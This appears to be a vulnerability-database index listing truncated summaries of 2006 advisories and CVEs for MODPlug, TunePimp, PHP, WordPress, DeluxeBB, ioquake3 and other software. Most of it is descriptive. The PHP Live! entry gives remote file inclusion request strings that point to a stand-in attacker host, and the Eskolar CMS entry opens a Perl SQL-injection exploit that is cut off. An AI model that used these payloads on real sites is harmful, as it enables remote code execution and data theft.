Stack and heap overflows in MODPlug Tracker/OpenMPT 1.17.02.43 and libmodplug 0.8
Luigi Auriemma Application: OpenMPT aka MODPlug Tracker http://modplug.sourceforge.net http://www.modplug.com libmodplug http://modplug-xmms.sourceforge.net Versions: OpenMPT = 1.17.02.43 and current SVN libmodplug = 0.8 and current CVS Platforms: Windows nix, BSD, XMMS plugin and others Bugs: A...
CVE-2006-3584
Dynamic variable evaluation vulnerability in index.php in Jetbox CMS 2.1 SR1 allows remote attackers to overwrite configuration variables via URL parameters, which are evaluated as PHP variable variables...
GLSA-200607-11 : TunePimp: Buffer overflow
The remote host is affected by the vulnerability described in GLSA-200607-11 TunePimp: Buffer overflow Kevin Kofler has reported a vulnerability where three stack variables are allocated with 255, 255 and 100 bytes respectively, yet 256 bytes are read into each. This could lead to buffer overflow...
TunePimp: Buffer overflow
Background The TunePimp library also referred to as libtunepimp is a development library geared towards developers who wish to create MusicBrainz enabled tagging applications. Description Kevin Kofler has reported a vulnerability where three stack variables are allocated with 255, 255 and 100 byt...
Moderate: Red Hat Security Advisory: php security update for Stronghold
An updated version of PHP that addresses several security issues is now available for Stronghold 4.0 for Enterprise Linux. This update has been rated as having moderate security impact by the Red Hat Security Response Team. PHP is an HTML-embedded scripting language. Several security issues were...
security flaw
Cross-site scripting (XSS) vulnerability in phpinfo (info.c) in PHP 5.1.2 and 4.4.2 allows remote attackers to inject arbitrary web script or HTML via long array variables, including (1) a large number of dimensions or (2) long values, which prevents HTML tags from being removed...
CVE-2006-3798
DeluxeBB 1.07 and earlier allows remote attackers to overwrite the (1) GET, (2) POST, (3) ENV, and (4) SERVER variables via the COOKIE (aka COOKIE) variable, which can overwrite the other variables during an extract function call, probably leading to multiple security vulnerabilities, aka "pollution of the...
Fantastic Guestbook v2.0.1 Advisory
.:. Fantastic Guestbook v2.0.1 Advisory .:. Date of written Advisory: ------------------------- July, 11 2006 Product: -------- Fantastic Guestbook v2.0.1 Vendor: ------- http://fscripts.com/ Description: ------------ Fantastic GuestBook version 2.0.1 is simple GuestBook; where remote user withou...
PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability
No description provided by source. Advisory: PHPLive 3.2 Remote Injection Vulnerability Release Date: 2006/07/23 Author: magnific Discovered: aneurysm.inc security research Risk: High Vendor Status: not contacted | no patch available Vendor Site: www.osicodes.com Contact: aneurysmincathotmaildotc...
PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability
Exploit for unknown platform in category web applications ============================================================ PHP Live! ----------- Execution: help.php?csspath=htt://attacker setup/header.php?csspath=htt://attacker ----------- Vendor: At the moment, there are no solutions from the vendor...
Eskolar CMS 0.9.0.0 - Blind SQL Injection
Eskolar CMS 0.9.0.0 - Blind SQL Injection ================================================================================================== !/usr/bin/perl use IO::Socket; ==================================================================================================...
CVE-2006-3390
WordPress 2.0.3 allows remote attackers to obtain the installation path via a direct request to various files, such as those in the (1) wp-admin, (2) wp-content, and (3) wp-includes directories, possibly due to uninitialized variables...
DEBIAN-CVE-2006-3390
WordPress 2.0.3 allows remote attackers to obtain the installation path via a direct request to various files, such as those in the (1) wp-admin, (2) wp-content, and (3) wp-includes directories, possibly due to uninitialized variables...
CentOS 3 / 4 : php (CESA-2005:831)
Updated PHP packages that fix multiple security issues are now available for Red Hat Enterprise Linux 3 and 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web...
CVE-2006-3325
The CVE affects the client component (cl_parse.c) of the id3 Quake 3 Engine 1.32c and the Icculus Quake 3 Engine (ioquake3) revision 810 and earlier. The flaw allows remote servers to send a sequence of cvar names/values that can overwrite write-protected client cvars, such as cl_allowdownload (A...